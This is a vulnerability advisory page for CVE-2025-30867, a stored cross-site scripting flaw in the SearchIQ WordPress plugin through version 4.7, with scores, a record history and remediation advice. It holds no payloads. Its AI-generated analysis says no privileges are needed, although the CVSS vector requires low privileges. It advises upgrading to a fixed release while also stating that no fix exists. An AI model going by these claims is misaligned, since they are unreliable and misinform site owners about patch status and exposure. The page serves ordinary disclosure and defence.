Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SearchIQ SearchIQ searchiq allows Stored XSS.This issue affects SearchIQ: from n/a through <= 4.7.
Published: 2025-03-27
Score: 6.5 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

An attacker can inject malicious scripts that are stored in the SearchIQ plugin and executed in the browsers of users who view the affected content, leading to defacement, credential theft or session hijacking. This Stored XSS flaw arises from not properly neutralizing input when generating plugin pages, a classic example of CWE‑79.

Affected Systems

WordPress sites that have the SearchIQ plugin installed, version 4.7 or earlier. The issue affects the SearchIQ:SearchIQ product from the earliest available version up to 4.7. No specific sub‑versions are listed, so any installation using 4.7 or any prior release should be considered vulnerable.

Risk and Exploitability

The CVSS score of 6.5 indicates a moderate severity. The EPSS score of less than 1% shows that the exploitation probability is very low. The vulnerability is not listed in the CISA KEV catalog. The likely attack vector is through the search interface or administrative entry points where user input is accepted without sanitization, and an attacker would need to supply malicious script payloads that the plugin stores and later outputs to other users. No privilege elevation is required, and the impact is confined to the affected site and its visitors.

Generated by OpenCVE AI on May 1, 2026 at 12:54 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade the SearchIQ plugin to the latest available version (any release newer than 4.7) to apply the XSS fix.
  • If an upgrade is not feasible immediately, completely disable or uninstall the SearchIQ plugin to prevent the vulnerability from being exposed.
  • For any custom code that echoes user input from the plugin, ensure proper server‑side output encoding or sanitization to mitigate the stored XSS risk.

Generated by OpenCVE AI on May 1, 2026 at 12:54 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
EUVD EUVD EUVD-2025-8330 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SearchIQ SearchIQ allows Stored XSS. This issue affects SearchIQ: from n/a through 4.7.
History

Thu, 23 Apr 2026 15:00:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}

 cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Wed, 01 Apr 2026 23:45:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SearchIQ SearchIQ allows Stored XSS. This issue affects SearchIQ: from n/a through 4.7. Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SearchIQ SearchIQ searchiq allows Stored XSS.This issue affects SearchIQ: from n/a through <= 4.7.
References
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

 cvssV3_1

{'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}

Mon, 09 Jun 2025 19:30:00 +0000

Type Values Removed Values Added
First Time appeared Searchiq
Searchiq searchiq
CPEs cpe:2.3:a:searchiq:searchiq:*:*:*:*:*:wordpress:*:*
Vendors & Products Searchiq
Searchiq searchiq

Thu, 27 Mar 2025 14:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Thu, 27 Mar 2025 11:00:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SearchIQ SearchIQ allows Stored XSS. This issue affects SearchIQ: from n/a through 4.7.
Title WordPress SearchIQ plugin <= 4.7 - Cross Site Scripting (XSS) vulnerability
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Subscriptions

Searchiq Searchiq
cve-icon MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-28T16:11:59.231Z

Reserved: 2025-03-26T09:21:08.359Z

Link: CVE-2025-30867

cve-icon Vulnrichment

Updated: 2025-03-27T13:18:17.816Z

cve-icon NVD

Status : Modified

Published: 2025-03-27T11:15:47.960

Modified: 2026-04-23T15:27:13.450

Link: CVE-2025-30867

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-01T13:00:12Z

Weaknesses